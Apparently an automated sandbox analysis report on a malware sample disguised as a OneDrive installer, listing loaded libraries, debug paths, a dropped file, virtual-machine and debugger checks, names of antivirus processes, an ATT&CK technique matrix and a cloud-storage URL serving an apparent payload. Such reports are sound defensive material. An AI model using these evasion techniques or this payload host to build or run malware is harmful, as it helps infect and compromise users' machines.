Source: yJLckVp9HE.exeString found in binary or memory: Software\RegisteredApplicationsSoftware\Microsoft\SkyDriveSoftware\Microsoft\Windows\CurrentVersion\UninstallSoftware\Microsoft\Windows\CurrentVersion\Explorer\User Shell FoldersLocal AppDataSYSTEM\CurrentControlSet\Control\Session Manager\EnvironmentTMPUserInitiatedUninstallrefcount.iniMigrationCompletedMicrosoft SkyDriveMicrosoft OneDrivesetupMicrosoft\OneDriveMicrosoft\SkyDriveMicrosoft\OneDrive\setup\logs\DeletedDirectoriesGlobal\SkyDriveSetup-E678D3F5-C063-4161-8F0D-CBB04C96A016Global\OneDriveSetup-A03BCD95-2F7C-40A1-8557-ECF26D67C053logsMicrosoft\OneDrive\logssettingsClientPolicy.iniUpdateSkyDriveSetup.exeOneDriveSetup.exeThis is the registry for Microsoft OneDrive19.9999.9999.9999manifest.xmlListSync /permachine /peruser /silent /uninstall /childprocess /cusid /defaultalluser /update /selfrepair /oneuser /onedriverepair /vermismatchrepair /resourcesprirepair /restart /detectprivsneeded /oem /thfirstsetup /extractFilesWithLessThreadCount /extractFilesInBackgroundThreadMode /enableOMCTelemetry /enableAriaUtc /WOFCompressionKillSwitch /removeNonCurrentVersions /allusers /renameReplaceOneDriveExe /renameReplaceODSUExe /enableODSUReportingMode /installWebView2 /setupShouldVerifyEKUSignature /SetPerProcessSystemDPIForceOffKey /EnableCachingBinariesSigningLevel /RemovePerProcessSystemDPIForceOffKeyKillSwitch /EnableNucleusAutoStartFix /TerminateOneDriveRetryOnSetup /BootstrapFromSetupForAutoStartRepair /RegisterOneDriveLauncherAutoStartTask /ForceUnRegisterOneDriveLauncherAutoStartTask /UnRegisterOneDriveLauncherKillswitch /AdditionalFCATerminateKillswitch /ReportOneDriveDownTelemetrySOFTWARE\Microsoft\Windows\CurrentVersion\RunOneDriveSetupSOFTWARE\Microsoft\Windows\CurrentVersion\RunOncevector too long,;
Source: yJLckVp9HE.exeString found in binary or memory: Software\RegisteredApplicationsSoftware\Microsoft\SkyDriveSoftware\Microsoft\Windows\CurrentVersion\UninstallSoftware\Microsoft\Windows\CurrentVersion\Explorer\User Shell FoldersLocal AppDataSYSTEM\CurrentControlSet\Control\Session Manager\EnvironmentTMPUserInitiatedUninstallrefcount.iniMigrationCompletedMicrosoft SkyDriveMicrosoft OneDrivesetupMicrosoft\OneDriveMicrosoft\SkyDriveMicrosoft\OneDrive\setup\logs\DeletedDirectoriesGlobal\SkyDriveSetup-E678D3F5-C063-4161-8F0D-CBB04C96A016Global\OneDriveSetup-A03BCD95-2F7C-40A1-8557-ECF26D67C053logsMicrosoft\OneDrive\logssettingsClientPolicy.iniUpdateSkyDriveSetup.exeOneDriveSetup.exeThis is the registry for Microsoft OneDrive19.9999.9999.9999manifest.xmlListSync /permachine /peruser /silent /uninstall /childprocess /cusid /defaultalluser /update /selfrepair /oneuser /onedriverepair /vermismatchrepair /resourcesprirepair /restart /detectprivsneeded /oem /thfirstsetup /extractFilesWithLessThreadCount /extractFilesInBackgroundThreadMode /enableOMCTelemetry /enableAriaUtc /WOFCompressionKillSwitch /removeNonCurrentVersions /allusers /renameReplaceOneDriveExe /renameReplaceODSUExe /enableODSUReportingMode /installWebView2 /setupShouldVerifyEKUSignature /SetPerProcessSystemDPIForceOffKey /EnableCachingBinariesSigningLevel /RemovePerProcessSystemDPIForceOffKeyKillSwitch /EnableNucleusAutoStartFix /TerminateOneDriveRetryOnSetup /BootstrapFromSetupForAutoStartRepair /RegisterOneDriveLauncherAutoStartTask /ForceUnRegisterOneDriveLauncherAutoStartTask /UnRegisterOneDriveLauncherKillswitch /AdditionalFCATerminateKillswitch /ReportOneDriveDownTelemetrySOFTWARE\Microsoft\Windows\CurrentVersion\RunOneDriveSetupSOFTWARE\Microsoft\Windows\CurrentVersion\RunOncevector too long,;
Source: unknownProcess created: C:\Users\user\Desktop\yJLckVp9HE.exe "C:\Users\user\Desktop\yJLckVp9HE.exe"
Source: C:\Users\user\Desktop\yJLckVp9HE.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7272 -s 1240
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: wer.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: wscapi.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: cldapi.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: fltlib.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: yJLckVp9HE.exeStatic PE information: More than 263 > 100 exports found
Source: yJLckVp9HE.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: yJLckVp9HE.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: yJLckVp9HE.exeStatic file information: File size 83686952 > 1048576
Source: yJLckVp9HE.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x34ac00
Source: yJLckVp9HE.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x116e00
Source: yJLckVp9HE.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x4b26c00
Source: yJLckVp9HE.exeStatic PE information: More than 200 imports for KERNEL32.dll
Source: yJLckVp9HE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: yJLckVp9HE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: yJLckVp9HE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: yJLckVp9HE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: yJLckVp9HE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: yJLckVp9HE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: yJLckVp9HE.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: yJLckVp9HE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: TEST_mi_exe_stub.pdb source: bin.exe.0.dr
Source: Binary string: Z:\Zemana\Projects\AMSDKCore\Driver\zam64.pdb source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: F:\dbs\sh\odct\0201_092045\client\onedrive\Setup\standalone\exe\obj\amd64\OneDriveSetup.pdb source: yJLckVp9HE.exe
Source: Binary string: C:\Users\Administrator\Desktop\KinndigitDll\x64\Release\KinndigitDll.pdb source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmp
Source: yJLckVp9HE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: yJLckVp9HE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: yJLckVp9HE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: yJLckVp9HE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: yJLckVp9HE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\yJLckVp9HE.exeUnpacked PE file: 0.2.yJLckVp9HE.exe.140000000.2.unpack
Source: bin.exe.0.drStatic PE information: real checksum: 0x1537e5 should be: 0x15a32e
Source: yJLckVp9HE.exeStatic PE information: section name: .didat
Source: yJLckVp9HE.exeStatic PE information: section name: _RDATA
Source: C:\Users\user\Desktop\yJLckVp9HE.exeFile created: C:\Users\Public\Downloads\20250312042223\bin.exeJump to dropped file
Source: C:\Users\user\Desktop\yJLckVp9HE.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeDropped PE file which has not been started: C:\Users\Public\Downloads\20250312042223\bin.exeJump to dropped file
Source: Amcache.hve.9.drBinary or memory string: VMware
Source: yJLckVp9HE.exe, 00000000.00000002.1498111901.000001ECD6677000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`bo
Source: Amcache.hve.9.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.9.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.9.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.9.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.9.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: yJLckVp9HE.exe, 00000000.00000002.1498111901.000001ECD66E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.9.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.9.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.drBinary or memory string: vmci.sys
Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.9.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.9.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.drBinary or memory string: VMware20,1
Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.9.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.9.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.9.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.9.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.9.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.9.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\yJLckVp9HE.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\yJLckVp9HE.exeCode function: 0_2_0000000140015500 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0000000140015500
Source: Amcache.hve.9.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.LOG1.9.dr, Amcache.hve.9.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.9.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: 360Safe.exe
Source: Amcache.hve.LOG1.9.dr, Amcache.hve.9.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: 360tray.exe
Source: yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: 360Tray.exe
Source: Amcache.hve.LOG1.9.dr, Amcache.hve.9.drBinary or memory string: MsMpEng.exe
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter
1
DLL Side-Loading
1
Process Injection
1
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
Query Registry
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager21
Security Software Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Software Packing
NTDS1
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets1
Process Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials2
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
yJLckVp9HE.exe13%ReversingLabsWin64.Malware.Generic
yJLckVp9HE.exe13%VirustotalBrowse
SourceDetectionScannerLabelLink
C:\Users\Public\Downloads\20250312042223\bin.exe0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://oiuecvb-1341436096.cos.ap-hongkong.myqcloud.com/gg.binY0%Avira URL Cloudsafe
https://oiuecvb-1341436096.cos.ap-hongkong.myqcloud.com/gg.bin0%Avira URL Cloudsafe
https://oiuecvb-1341436096.cos.ap-hongkong.myqcloud.com/gg.binl0%Avira URL Cloudsafe
https://oiuecvb-1341436096.cos.ap-hongkong.myqcloud.com/0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
hk.file.myqcloud.com
43.132.105.214
truefalse
    high
    www.wshifen.com
    103.235.46.115
    truefalse
      high
      oiuecvb-1341436096.cos.ap-hongkong.myqcloud.com
      unknown
      unknownfalse
        unknown
        www.baidu.com
        unknown
        unknownfalse
          high
          NameMaliciousAntivirus DetectionReputation
          https://oiuecvb-1341436096.cos.ap-hongkong.myqcloud.com/gg.binfalse
          • Avira URL Cloud: safe
          unknown
          http://www.baidu.com/false
            high
            NameSourceMaliciousAntivirus DetectionReputation
            https://g.live.com/odclientsettings/EnterpriseV2IyJLckVp9HE.exe, 00000000.00000002.1498111901.000001ECD6677000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              https://curl.se/docs/http-cookies.htmlyJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmpfalse
                high
                https://dc.services.visualstudio.com/v2/track8N.yJLckVp9HE.exe, 00000000.00000000.1259051673.00007FF6E822C000.00000002.00000001.01000000.00000003.sdmp, yJLckVp9HE.exe, 00000000.00000002.1499103066.00007FF6E822C000.00000002.00000001.01000000.00000003.sdmpfalse
                  high
                  https://oiuecvb-1341436096.cos.ap-hongkong.myqcloud.com/yJLckVp9HE.exe, 00000000.00000002.1498111901.000001ECD6677000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://clients.config.office.net/user/v1.0/tenantassociationkeyyJLckVp9HE.exe, 00000000.00000002.1498111901.000001ECD6677000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://www.baidu.com/favicon.icoyJLckVp9HE.exe, 00000000.00000002.1498208964.000001ECD8412000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      http://upx.sf.netAmcache.hve.9.drfalse
                        high
                        http://www.baidu.com/4yJLckVp9HE.exe, 00000000.00000002.1498014858.000001ECD6646000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://oiuecvb-1341436096.cos.ap-hongkong.myqcloud.com/gg.binlyJLckVp9HE.exe, 00000000.00000002.1498111901.000001ECD6677000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://clients.config.office.net/collector/v1.0/inventoryodb0.010.03ar;bg;ca;cs;da;de;el;en;en-GB;eyJLckVp9HE.exefalse
                            high
                            https://g.live.com/odclientsettings/ProdV2nyJLckVp9HE.exe, 00000000.00000002.1498111901.000001ECD6677000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://curl.se/docs/alt-svc.htmlyJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmpfalse
                                high
                                https://clients.config.gcc.office.net/odb/v1.0/synchealth$OwyJLckVp9HE.exe, 00000000.00000002.1498111901.000001ECD6677000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://dc.services.visualstudio.com/v2/trackyJLckVp9HE.exefalse
                                    high
                                    https://g.live.com/odclientsettings/EnterpriseV2https://g.live.com/odclientsettings/MsitFastV2https:yJLckVp9HE.exefalse
                                      high
                                      http://www.baidu.com/Date:yJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmpfalse
                                        high
                                        https://g.live.com/odclientsettings/InsidersV2CyJLckVp9HE.exe, 00000000.00000002.1498111901.000001ECD6677000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://curl.se/docs/hsts.htmlyJLckVp9HE.exe, 00000000.00000002.1498280802.000001ECD84D0000.00000040.00001000.00020000.00000000.sdmp, yJLckVp9HE.exe, 00000000.00000002.1497353209.0000000140000000.00000040.00001000.00020000.00000000.sdmpfalse
                                            high
